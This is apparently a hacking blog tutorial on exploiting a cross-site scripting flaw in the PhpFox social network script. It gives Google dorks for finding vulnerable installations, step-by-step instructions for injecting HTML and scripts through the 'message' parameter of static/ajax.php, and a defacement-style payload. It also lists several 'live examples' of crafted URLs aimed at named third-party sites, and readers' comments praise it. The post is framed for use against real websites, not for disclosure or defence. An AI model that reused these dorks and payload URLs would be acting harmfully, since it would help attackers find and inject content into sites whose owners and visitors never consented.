PhpFox is a Php Script For Making Social Networking website, Similiar to Facebook.
3.1 and some other versions of PhpFox are vulnerable For XSS.
3.1 and some other versions of PhpFox are vulnerable For XSS.
Google Dork :
"intext:© · English (US) Powered By phpFox Version 3.0.1."
"inurl:/static/ajax.php?core"
Open any website for search results with text :© · English (US) Powered By phpFox Version 3.0.1
or url xyz.com/static/ajax.php?core
now You'll Get something Like This URL give below
http://www.devilscafe.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">some message here&core[security_token]=99d754d2b583565369e194e30eaabcbc
Now Chnage the Text &Message= blah blah blah.... (you have to replace the red text with your html Tags)
for example
http://www.devilscafe.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
&core[security_token]=99d754d2b583565369e194e30eaabcbc
<center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
You can use multiple html Tags, and scripts here For details Check This Post
Live examples :
http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>&core[security_token]=99d754d2b583565369e194e30eaabcbc
http://www.marshable.net/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message= <center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20<center><font%20color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a%20href='http://www.devilscafe.in'><img%20src="http://i55.tinypic.com/14uuv14.png"/>
http://mstudio84.com/gist/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://parsdb.ir/accessories/social_network/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://sohiran.ir/fb/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
404 comments:
«Oldest ‹Older 1 – 200 of 404 Newer› Newest»Nyc Tut bRo;)
very Goood
thanx admin
Post a Comment
If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.
Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!
Thanks for reading,
Admin